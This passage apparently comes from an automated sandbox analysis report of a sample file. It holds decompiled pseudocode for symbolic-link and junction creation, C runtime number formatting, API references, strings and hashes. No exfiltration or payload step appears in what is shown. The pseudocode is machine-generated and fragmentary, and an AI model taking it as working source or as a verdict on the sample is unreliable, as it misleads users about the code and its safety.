						_t195 = 0x5c;
						 *((short*)(_t253 - 0x207c)) = _t195;
						_t199 = _t253 - 0x207a;
						_t236 = _t236 + 6;
					}
				}
				E00B86066(_t199, _t236);
				_t112 = E00B83E13(_t253 - 0x207c);
				_t237 =  *((intOrPtr*)(_t253 + 8));
				_t200 =  *(_t253 + 0xc);
				 *(_t253 - 0x18) = _t112;
				if( *((char*)(_t237 + 0x7197)) != 0) {
					L11:
					E00B6A0B1(_t200, _t204, _t237, _t253, _t200, 1,  *(_t237 + 0x714b) & 0x000000ff);
					if(E00B6A231(_t200) != 0) {
						_t186 = E00B6A28F(E00B6A243(_t200));
						_push(_t200);
						if(_t186 == 0) {
							E00B6A1E0();
						} else {
							E00B6A18F();
						}
					}
					if( *((char*)(_t244 + 0x10f1)) != 0 ||  *((char*)(_t244 + 0x2104)) != 0) {
						__eflags = CreateDirectoryW(_t200, 0);
						if(__eflags != 0) {
							goto L20;
						}
						_t201 = 0;
						E00B62021(__eflags, 0x14, 0, _t200);
						E00B66D83(0xba1098, 9);
						goto L41;
					} else {
						_t182 = CreateFileW(_t200, 0x40000000, 0, 0, 1, 0x80, 0);
						if(_t182 != 0xffffffff) {
							CloseHandle(_t182);
							L20:
							_t117 =  *((intOrPtr*)(_t244 + 0x1100));
							__eflags = _t117 - 3;
							if(_t117 != 3) {
								__eflags = _t117 - 2;
								if(_t117 == 2) {
									L26:
									_t233 =  *(_t253 - 0x2c);
									_t205 =  *(_t253 - 0x14) & 0x0000ffff;
									_t238 =  *(_t253 - 0x18) & 0x0000ffff;
									 *_t233 = 0xa000000c;
									_t245 = _t205 + _t205;
									 *((short*)(_t233 + 0xa)) = _t245;
									 *((short*)(_t233 + 4)) = 0x10 + (_t238 + _t205) * 2;
									 *((intOrPtr*)(_t233 + 6)) = 0;
									E00B86066(_t233 + 0x14, _t253 - 0x107c);
									_t246 =  *(_t253 - 0x2c);
									 *((short*)(_t246 + 0xc)) = _t245 + 2;
									 *((short*)(_t246 + 0xe)) = _t238 + _t238;
									E00B86066(_t246 + ( *(_t253 - 0x14) + 0xb) * 2, _t253 - 0x207c);
									_t134 =  *(_t253 - 0xd) & 0x000000ff ^ 0x00000001;
									__eflags = _t134;
									 *(_t246 + 0x10) = _t134;
									L27:
									_t239 = CreateFileW(_t200, 0xc0000000, 0, 0, 3, 0x2200000, 0);
									__eflags = _t239 - 0xffffffff;
									if(_t239 != 0xffffffff) {
										__eflags = DeviceIoControl(_t239, 0x900a4, _t246, ( *(_t246 + 4) & 0x0000ffff) + 8, 0, 0, _t253 - 0x30, 0);
										if(__eflags != 0) {
											E00B69556(_t253 - 0x30b4);
											 *(_t253 - 4) = 1;
											E00B67A7B(_t253 - 0x30b4, _t239);
											_t240 =  *((intOrPtr*)(_t253 + 8));
											_t247 =  *((intOrPtr*)(_t253 + 0x10));
											asm("sbb ecx, ecx");
											asm("sbb ecx, ecx");
											asm("sbb ecx, ecx");
											E00B69DA2(_t253 - 0x30b4,  *((intOrPtr*)(_t253 + 0x10)),  ~( *(_t240 + 0x82d0)) &  *((intOrPtr*)(_t253 + 0x10)) + 0x00001040,  ~( *(_t240 + 0x82d4)) & _t247 + 0x00001048,  ~( *(_t240 + 0x82d8)) & _t247 + 0x00001050);
											E00B69620(_t253 - 0x30b4);
											__eflags =  *((char*)(_t240 + 0x71a8));
											if( *((char*)(_t240 + 0x71a8)) == 0) {
												E00B6A4ED(_t200,  *((intOrPtr*)(_t247 + 0x24)));
											}
											_t201 = 1;
											E00B6959A(_t253 - 0x30b4);
											L41:
											E00B615FB(_t253 - 0x2c);
											 *[fs:0x0] =  *((intOrPtr*)(_t253 - 0xc));
											return _t201;
										}
										CloseHandle(_t239);
										E00B62021(__eflags, 0x15, 0, _t200);
										_t154 = GetLastError();
										__eflags = _t154 - 5;
										if(_t154 == 5) {
											L32:
											__eflags = E00B707BC();
											if(__eflags == 0) {
												E00B615C6(_t253 - 0x7c, 0x18);
												E00B715FE(_t253 - 0x7c);
											}
											L34:
											E00B66DCB(0xba1098, __eflags);
											E00B66D83(0xba1098, 9);
											_t250 =  *((intOrPtr*)(_t253 + 0x10));
											_push(_t200);
											__eflags =  *((char*)(_t250 + 0x10f1));
											if( *((char*)(_t250 + 0x10f1)) == 0) {
												DeleteFileW();
											} else {
												RemoveDirectoryW();
											}
											L37:
											_t201 = 0;
											goto L41;
										}
										__eflags = _t154 - 0x522;
										if(__eflags != 0) {
											goto L34;
										}
										goto L32;
									}
									E00B66C23(_t200);
									E00B66D83(0xba1098, 9);
									goto L37;
								}
								__eflags = _t117 - 1;
								if(_t117 != 1) {
									goto L37;
								}
								goto L26;
							}
							_t234 =  *(_t253 - 0x2c);
							_t229 =  *(_t253 - 0x14) & 0x0000ffff;
							_t242 =  *(_t253 - 0x18) & 0x0000ffff;
							 *_t234 = 0xa0000003;
							_t252 = _t229 + _t229;
							 *((short*)(_t234 + 0xa)) = _t252;
							 *((short*)(_t234 + 4)) = 0xc + (_t242 + _t229) * 2;
							 *((intOrPtr*)(_t234 + 6)) = 0;
							E00B86066(_t234 + 0x10, _t253 - 0x107c);
							_t246 =  *(_t253 - 0x2c);
							 *((short*)(_t246 + 0xc)) = _t252 + 2;
							 *((short*)(_t246 + 0xe)) = _t242 + _t242;
							E00B86066(_t246 + ( *(_t253 - 0x14) + 9) * 2, _t253 - 0x207c);
							goto L27;
						}
						E00B66C23(_t200);
						goto L37;
					}
				}
				if( *(_t253 - 0xd) != 0) {
					goto L37;
				}
				_t190 = E00B6BCC3(_t244 + 0x1104);
				_t269 = _t190;
				if(_t190 != 0) {
					goto L37;
				}
				_push(_t244 + 0x1104);
				_push(_t200);
				_push(_t244 + 0x28);
				_push(_t237);
				if(E00B67861(_t269) == 0) {
					goto L37;
				}
				goto L11;
			}

0x00b66faa
0x00b66fb4
0x00b66fc0
0x00b66fc7
0x00b66fd1
0x00b66fd6
0x00b66fd6
0x00b66fe5
0x00b66fe8
0x00b66fed
0x00b66ff0
0x00b67007
0x00b6701a
0x00b6701d
0x00b67025
0x00b67031
0x00b67036
0x00b6703b
0x00b6703e
0x00b67043
0x00b67045
0x00b67045
0x00b6704d
0x00b67057
0x00b6705c
0x00b67061
0x00b67065
0x00b67066
0x00b6706d
0x00b67073
0x00b67073
0x00b67061
0x00b67078
0x00b67084
0x00b67089
0x00b6708f
0x00b67092
0x00b6709c
0x00b670d6
0x00b670e1
0x00b670ee
0x00b670f7
0x00b670fc
0x00b670ff
0x00b67108
0x00b67101
0x00b67101
0x00b67101
0x00b670ff
0x00b67114
0x00b671e1
0x00b671e3
0x00000000
0x00000000
0x00b671ea
0x00b671ef
0x00b671fb
0x00000000
0x00b67127
0x00b67139
0x00b67142
0x00b67155
0x00b6715b
0x00b6715b
0x00b67161
0x00b67164
0x00b67205
0x00b67208
0x00b67213
0x00b67216
0x00b67219
0x00b6721f
0x00b67222
0x00b67228
0x00b6722b
0x00b67239
0x00b6723f
0x00b6724d
0x00b67255
0x00b67258
0x00b6725f
0x00b67274
0x00b67280
0x00b67280
0x00b67283
0x00b67286
0x00b6729e
0x00b672a0
0x00b672a3
0x00b672de
0x00b672e0
0x00b6735d
0x00b67369
0x00b6736d
0x00b67372
0x00b67375
0x00b67386
0x00b67399
0x00b673ac
0x00b673b7
0x00b673c2
0x00b673c7
0x00b673ce
0x00b673d4
0x00b673d4
0x00b673df
0x00b673e1
0x00b673e6
0x00b673e9
0x00b673f6
0x00b673fe
0x00b673fe
0x00b672e3
0x00b672ee
0x00b672f3
0x00b672f9
0x00b672fc
0x00b67305
0x00b6730a
0x00b6730c
0x00b67313
0x00b6731b
0x00b6731b
0x00b67320
0x00b67327
0x00b67330
0x00b67335
0x00b67338
0x00b67339
0x00b67340
0x00b6734a
0x00b67342
0x00b67342
0x00b67342
0x00b67350
0x00b67350
0x00000000
0x00b67350
0x00b672fe
0x00b67303
0x00000000
0x00000000
0x00000000
0x00b67303
0x00b672ad
0x00b672b6
0x00000000
0x00b672b6
0x00b6720a
0x00b6720d
0x00000000
0x00000000
0x00000000
0x00b6720d
0x00b6716d
0x00b67170
0x00b67176
0x00b67179
0x00b6717f
0x00b67182
0x00b67190
0x00b67196
0x00b671a4
0x00b671ac
0x00b671af
0x00b671b6
0x00b671cb
0x00000000
0x00b671d0
0x00b6714a
0x00000000
0x00b6714a
0x00b67114
0x00b670a2
0x00000000
0x00000000
0x00b670af
0x00b670b4
0x00b670b6
0x00000000
0x00000000
0x00b670c2
0x00b670c3
0x00b670c7
0x00b670c8
0x00b670d0
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00B66FAA
_wcslen.LIBCMT ref: 00B67013
_wcslen.LIBCMT ref: 00B67084

Part of subcall function 00B67A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B67AAB
Part of subcall function 00B67A9C: GetLastError.KERNEL32 ref: 00B67AF1
Part of subcall function 00B67A9C: CloseHandle.KERNEL32(?), ref: 00B67B00

Part of subcall function 00B6A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00B6977F,?,?,00B695CF,?,?,?,?,?,00B92641,000000FF), ref: 00B6A1F1
Part of subcall function 00B6A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00B6977F,?,?,00B695CF,?,?,?,?,?,00B92641), ref: 00B6A21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00B67139
CloseHandle.KERNEL32(00000000), ref: 00B67155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00B67298

Part of subcall function 00B69DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00B673BC,?,?,?,00000000), ref: 00B69DBC
Part of subcall function 00B69DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00B69E70

Part of subcall function 00B69620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00B695D6,?,?,?,?,?,00B92641,000000FF), ref: 00B6963B

Part of subcall function 00B6A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B6A325,?,?,?,00B6A175,?,00000001,00000000,?,?), ref: 00B6A501
Part of subcall function 00B6A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B6A325,?,?,?,00B6A175,?,00000001,00000000,?,?), ref: 00B6A532

Strings

UNC\, xrefs: 00B67051
SeCreateSymbolicLinkPrivilege, xrefs: 00B66FCC
SeRestorePrivilege, xrefs: 00B66FC2
\??\, xrefs: 00B6702B

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 2821348736-3508440684
Opcode ID: 04c3776d2728f802046354a84b36b65c1d45542b9279f61f30acda6208c71b56
Instruction ID: 7bc1090449bf67f36b39001a0eefacd7ee86258fb03c7f0be63f3c833e9b28ec
Opcode Fuzzy Hash: 04c3776d2728f802046354a84b36b65c1d45542b9279f61f30acda6208c71b56
Instruction Fuzzy Hash: E1C1D971944644AAEB21DB74CC81FEEB3ECEF05704F0045DAF956E7282DB38AA44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B8D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 68%

			E00B8D8EE(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v32;
				signed int _v36;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _t743;
				signed int _t753;
				signed int _t754;
				intOrPtr _t763;
				signed int _t764;
				intOrPtr _t767;
				intOrPtr _t770;
				intOrPtr _t772;
				intOrPtr _t773;
				void* _t774;
				signed int _t777;
				signed int _t778;
				signed int _t784;
				void* _t789;
				signed int _t790;
				intOrPtr _t792;
				void* _t793;
				signed int _t794;
				signed int _t795;
				signed int _t796;
				signed int _t805;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t825;
				signed int _t826;
				signed int _t832;
				signed int _t833;
				signed int _t836;
				signed int _t841;
				signed int _t849;
				signed int* _t852;
				signed int _t856;
				signed int _t867;
				signed int _t868;
				signed int _t870;
				char* _t871;
				signed int _t874;
				signed int _t878;
				signed int _t879;
				signed int _t884;
				signed int _t886;
				signed int _t891;
				signed int _t900;
				signed int _t903;
				signed int _t905;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t913;
				signed int _t926;
				signed int _t927;
				signed int _t929;
				char* _t930;
				signed int _t933;
				signed int _t937;
				signed int _t938;
				signed int* _t940;
				signed int _t943;
				signed int _t945;
				signed int _t950;
				signed int _t958;
				signed int _t961;
				signed int _t965;
				signed int* _t972;
				intOrPtr _t974;
				void* _t975;
				intOrPtr* _t977;
				signed int* _t981;
				unsigned int _t992;
				signed int _t993;
				void* _t996;
				signed int _t997;
				void* _t999;
				signed int _t1000;
				signed int _t1001;
				signed int _t1002;
				signed int _t1012;
				signed int _t1017;
				signed int _t1020;
				unsigned int _t1023;
				signed int _t1024;
				void* _t1027;
				signed int _t1028;
				void* _t1030;
				signed int _t1031;
				signed int _t1032;
				signed int _t1033;
				signed int _t1038;
				signed int* _t1043;
				signed int _t1045;
				signed int _t1055;
				void* _t1056;
				void _t1058;
				signed int _t1061;
				void* _t1064;
				void* _t1071;
				signed int _t1077;
				signed int _t1078;
				void* _t1080;
				signed int _t1081;
				signed int _t1082;
				signed int _t1084;
				signed int _t1085;
				signed int _t1086;
				signed int _t1090;
				signed int _t1094;
				signed int _t1095;
				signed int _t1096;
				signed int _t1098;
				signed int _t1099;
				signed int _t1100;
				signed int _t1101;
				signed int _t1102;
				signed int _t1103;
				signed int _t1105;
				signed int _t1106;
				signed int _t1107;
				signed int _t1108;
				signed int _t1109;
				signed int _t1110;
				unsigned int _t1111;
				void* _t1114;
				intOrPtr _t1116;
				signed int _t1117;
				signed int _t1118;
				signed int _t1119;
				signed int* _t1123;
				void* _t1127;
				void* _t1128;
				signed int _t1129;
				signed int _t1130;
				signed int _t1131;
				signed int _t1134;
				signed int _t1135;
				signed int _t1140;
				signed int _t1142;
				signed int _t1143;
				signed int _t1151;
				signed int _t1152;
				signed int _t1153;
				signed int _t1154;
				signed int _t1155;
				signed int _t1156;
				signed int _t1157;
				signed int _t1161;
				signed int _t1162;
				signed int _t1163;
				signed int _t1164;
				signed int _t1165;
				unsigned int _t1168;
				void* _t1172;
				void* _t1173;
				unsigned int _t1174;
				signed int _t1179;
				signed int _t1180;
				signed int _t1182;
				signed int _t1183;
				intOrPtr* _t1185;
				signed int _t1186;
				void* _t1187;
				signed int _t1188;
				signed int _t1189;
				signed int _t1192;
				signed int _t1194;
				signed int _t1195;
				void* _t1196;
				signed int _t1197;
				signed int _t1198;
				signed int _t1199;
				void* _t1202;
				signed int _t1203;
				signed int _t1204;
				signed int _t1205;
				signed int _t1206;
				signed int _t1207;
				signed int* _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1214;
				intOrPtr* _t1216;
				intOrPtr* _t1217;
				signed int _t1219;
				signed int _t1221;
				signed int _t1224;
				signed int _t1230;
				signed int _t1234;
				signed int _t1235;
				void* _t1236;
				signed int _t1240;
				signed int _t1243;
				signed int _t1244;
				signed int _t1245;
				signed int _t1246;
				signed int _t1247;
				signed int _t1248;
				signed int _t1250;
				signed int _t1251;
				signed int _t1252;
				signed int _t1253;
				signed int _t1255;
				signed int _t1256;
				signed int _t1257;
				signed int _t1258;
				signed int _t1259;
				signed int _t1261;
				signed int _t1262;
				signed int _t1264;
				signed int _t1266;
				signed int _t1268;
				signed int _t1271;
				signed int _t1273;
				signed int* _t1274;
				signed int* _t1277;
				signed int _t1286;

				_t1142 = __edx;
				_t1271 = _t1273;
				_t1274 = _t1273 - 0x964;
				_t743 =  *0xb9e7ac; // 0x37e7c6f
				_v8 = _t743 ^ _t1271;
				_push(__ebx);
				_t1055 = _a20;
				_push(__esi);
				_push(__edi);
				_t1185 = _a16;
				_v1924 = _t1185;
				_v1920 = _t1055;
				E00B8D416( &_v1944, __eflags);
				_t1234 = _a8;
				_t748 = 0x2d;
				if((_t1234 & 0x80000000) == 0) {
					_t748 = 0x120;
				}
				 *_t1185 = _t748;
				 *((intOrPtr*)(_t1185 + 8)) = _t1055;
				_t1186 = _a4;
				if((_t1234 & 0x7ff00000) != 0) {
					L5:
					_t753 = E00B89994( &_a4);
					_pop(_t1070);
					__eflags = _t753;
					if(_t753 != 0) {
						_t1070 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t754 = _t753 - 1;
					__eflags = _t754;
					if(_t754 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t777 = _t754 - 1;
						__eflags = _t777;
						if(_t777 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t778 = _t777 - 1;
							__eflags = _t778;
							if(_t778 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t778 == 1;
								if(_t778 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1186;
									_a8 = _t1234 & 0x7fffffff;
									_t1286 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1188 = _v1896;
									_v1916 = _a12 + 1;
									_t1077 = _t1188 >> 0x14;
									_t784 = _t1077 & 0x000007ff;
									__eflags = _t784;
									if(_t784 != 0) {
										_t1143 = 0;
										_t784 = 0;
										__eflags = 0;
									} else {
										_t1143 = 1;
									}
									_t1189 = _t1188 & 0x000fffff;
									_t1058 = _v1900 + _t784;
									asm("adc edi, esi");
									__eflags = _t1143;
									_t1078 = _t1077 & 0x000007ff;
									_t1240 = _t1078 - 0x434 + (0 | _t1143 != 0x00000000) + 1;
									_v1872 = _t1240;
									E00B8F460(_t1078, _t1286);
									_push(_t1078);
									 *_t1274 = _t1286;
									_t789 = E00B8F570();
									_t1080 = _t1078;
									_t790 = L00B923A0(_t789, _t1058, _t1080, _t1143);
									_v1904 = _t790;
									__eflags = _t790 - 0x7fffffff;
									if(_t790 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t790 - 0x80000000;
										if(_t790 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1058;
									__eflags = _t1189;
									_v464 = _t1189;
									_t1061 = (0 | _t1189 != 0x00000000) + 1;
									_v472 = _t1061;
									__eflags = _t1240;
									if(_t1240 < 0) {
										__eflags = _t1240 - 0xfffffc02;
										if(_t1240 == 0xfffffc02) {
											L101:
											_t792 =  *((intOrPtr*)(_t1271 + _t1061 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1081 = 0;
												__eflags = 0;
											} else {
												_t1081 = _t792 + 1;
											}
											_t793 = 0x20;
											_t794 = _t793 - _t1081;
											__eflags = _t794 - 1;
											_t795 = _t794 & 0xffffff00 | _t794 - 0x00000001 > 0x00000000;
											__eflags = _t1061 - 0x73;
											_v1865 = _t795;
											_t1082 = _t1081 & 0xffffff00 | _t1061 - 0x00000073 > 0x00000000;
											__eflags = _t1061 - 0x73;
											if(_t1061 != 0x73) {
												L107:
												_t796 = 0;
												__eflags = 0;
											} else {
												__eflags = _t795;
												if(_t795 == 0) {
													goto L107;
												} else {
													_t796 = 1;
												}
											}
											__eflags = _t1082;
											if(_t1082 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												E00B8BDE1( &_v468, 0x1cc,  &_v1396, 0);
												_t1274 =  &(_t1274[4]);
											} else {
												__eflags = _t796;
												if(_t796 != 0) {
													goto L126;
												} else {
													_t1109 = 0x72;
													__eflags = _t1061 - _t1109;
													if(_t1061 < _t1109) {
														_t1109 = _t1061;
													}
													__eflags = _t1109 - 0xffffffff;
													if(_t1109 != 0xffffffff) {
														_t1258 = _t1109;
														_t1216 =  &_v468 + _t1109 * 4;
														_v1880 = _t1216;
														while(1) {
															__eflags = _t1258 - _t1061;
															if(_t1258 >= _t1061) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1216;
															}
															_t210 = _t1258 - 1; // 0x70
															__eflags = _t210 - _t1061;
															if(_t210 >= _t1061) {
																_t1168 = 0;
																__eflags = 0;
															} else {
																_t1168 =  *(_t1216 - 4);
															}
															_t1216 = _t1216 - 4;
															_t972 = _v1880;
															_t1258 = _t1258 - 1;
															 *_t972 = _t1168 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t972 - 4;
															__eflags = _t1258 - 0xffffffff;
															if(_t1258 == 0xffffffff) {
																break;
															}
															_t1061 = _v472;
														}
														_t1240 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1109;
													} else {
														_t218 = _t1109 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1192 = 1 - _t1240;
											E00B7FFF0(_t1192,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1271 + 0xbad63d) = 1 << (_t1192 & 0x0000001f);
											_t805 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1110 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1110;
											__eflags = _t1061 - _t1110;
											if(_t1061 == _t1110) {
												_t1172 = 0;
												__eflags = 0;
												while(1) {
													_t974 =  *((intOrPtr*)(_t1271 + _t1172 - 0x570));
													__eflags = _t974 -  *((intOrPtr*)(_t1271 + _t1172 - 0x1d0));
													if(_t974 !=  *((intOrPtr*)(_t1271 + _t1172 - 0x1d0))) {
														goto L101;
													}
													_t1172 = _t1172 + 4;
													__eflags = _t1172 - 8;
													if(_t1172 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1173 = 0;
															__eflags = 0;
														} else {
															_t1173 = _t974 + 1;
														}
														_t975 = 0x20;
														_t1259 = _t1110;
														__eflags = _t975 - _t1173 - _t1110;
														_t977 =  &_v460;
														_v1880 = _t977;
														_t1217 = _t977;
														_t171 =  &_v1865;
														 *_t171 = _t975 - _t1173 - _t1110 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1259 - _t1061;
															if(_t1259 >= _t1061) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1217;
															}
															_t175 = _t1259 - 1; // 0x0
															__eflags = _t175 - _t1061;
															if(_t175 >= _t1061) {
																_t1174 = 0;
																__eflags = 0;
															} else {
																_t1174 =  *(_t1217 - 4);
															}
															_t1217 = _t1217 - 4;
															_t981 = _v1880;
															_t1259 = _t1259 - 1;
															 *_t981 = _t1174 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t981 - 4;
															__eflags = _t1259 - 0xffffffff;
															if(_t1259 == 0xffffffff) {
																break;
															}
															_t1061 = _v472;
														}
														__eflags = _v1865;
														_t1111 = _t1110 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1110;
														_t1219 = _t1111 >> 5;
														_v1884 = _t1111;
														_t1261 = _t1219 << 2;
														E00B7FFF0(_t1219,  &_v1396, 0, _t1261);
														 *(_t1271 + _t1261 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t805 = _t1219 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t805;
										_t1064 = 0x1cc;
										_v936 = _t805;
										__eflags = _t805 << 2;
										E00B8BDE1( &_v932, 0x1cc,  &_v1396, _t805 << 2);
										_t1277 =  &(_t1274[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1262 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1262;
										__eflags = _t1061 - _t1262;
										if(_t1061 != _t1262) {
											L53:
											_t992 = _v1872 + 1;
											_t993 = _t992 & 0x0000001f;
											_t1114 = 0x20;
											_v1876 = _t993;
											_t1221 = _t992 >> 5;
											_v1872 = _t1221;
											_v1908 = _t1114 - _t993;
											_t996 = E00B7F0C0(1, _t1114 - _t993, 0);
											_t1116 =  *((intOrPtr*)(_t1271 + _t1061 * 4 - 0x1d4));
											_t997 = _t996 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t997;
											_v1912 =  !_t997;
											if( *_t108 == 0) {
												_t1117 = 0;
												__eflags = 0;
											} else {
												_t1117 = _t1116 + 1;
											}
											_t999 = 0x20;
											_t1000 = _t999 - _t1117;
											_t1179 = _t1061 + _t1221;
											__eflags = _v1876 - _t1000;
											_v1892 = _t1179;
											_t1001 = _t1000 & 0xffffff00 | _v1876 - _t1000 > 0x00000000;
											__eflags = _t1179 - 0x73;
											_v1865 = _t1001;
											_t1118 = _t1117 & 0xffffff00 | _t1179 - 0x00000073 > 0x00000000;
											__eflags = _t1179 - 0x73;
											if(_t1179 != 0x73) {
												L59:
												_t1002 = 0;
												__eflags = 0;
											} else {
												__eflags = _t1001;
												if(_t1001 == 0) {
													goto L59;
												} else {
													_t1002 = 1;
												}
											}
											__eflags = _t1118;
											if(_t1118 != 0) {
												L81:
												__eflags = 0;
												_t1064 = 0x1cc;
												_v1400 = 0;
												_v472 = 0;
												E00B8BDE1( &_v468, 0x1cc,  &_v1396, 0);
												_t1274 =  &(_t1274[4]);
											} else {
												__eflags = _t1002;
												if(_t1002 != 0) {
													goto L81;
												} else {
													_t1119 = 0x72;
													__eflags = _t1179 - _t1119;
													if(_t1179 >= _t1119) {
														_t1179 = _t1119;
														_v1892 = _t1119;
													}
													_t1012 = _t1179;
													_v1880 = _t1012;
													__eflags = _t1179 - 0xffffffff;
													if(_t1179 != 0xffffffff) {
														_t1180 = _v1872;
														_t1264 = _t1179 - _t1180;
														__eflags = _t1264;
														_t1123 =  &_v468 + _t1264 * 4;
														_v1888 = _t1123;
														while(1) {
															__eflags = _t1012 - _t1180;
															if(_t1012 < _t1180) {
																break;
															}
															__eflags = _t1264 - _t1061;
															if(_t1264 >= _t1061) {
																_t1224 = 0;
																__eflags = 0;
															} else {
																_t1224 =  *_t1123;
															}
															__eflags = _t1264 - 1 - _t1061;
															if(_t1264 - 1 >= _t1061) {
																_t1017 = 0;
																__eflags = 0;
															} else {
																_t1017 =  *(_t1123 - 4);
															}
															_t1020 = _v1880;
															_t1123 = _v1888 - 4;
															_v1888 = _t1123;
															 *(_t1271 + _t1020 * 4 - 0x1d0) = (_t1224 & _v1884) << _v1876 | (_t1017 & _v1912) >> _v1908;
															_t1012 = _t1020 - 1;
															_t1264 = _t1264 - 1;
															_v1880 = _t1012;
															__eflags = _t1012 - 0xffffffff;
															if(_t1012 != 0xffffffff) {
																_t1061 = _v472;
																continue;
															}
															break;
														}
														_t1179 = _v1892;
														_t1221 = _v1872;
														_t1262 = 2;
													}
													__eflags = _t1221;
													if(_t1221 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1221 << 2);
														_t1274 =  &(_t1274[3]);
													}
													__eflags = _v1865;
													_t1064 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1179;
													} else {
														_v472 = _t1179 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1262;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1127 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1271 + _t1127 - 0x570)) -  *((intOrPtr*)(_t1271 + _t1127 - 0x1d0));
												if( *((intOrPtr*)(_t1271 + _t1127 - 0x570)) !=  *((intOrPtr*)(_t1271 + _t1127 - 0x1d0))) {
													goto L53;
												}
												_t1127 = _t1127 + 4;
												__eflags = _t1127 - 8;
												if(_t1127 != 8) {
													continue;
												} else {
													_t1023 = _v1872 + 2;
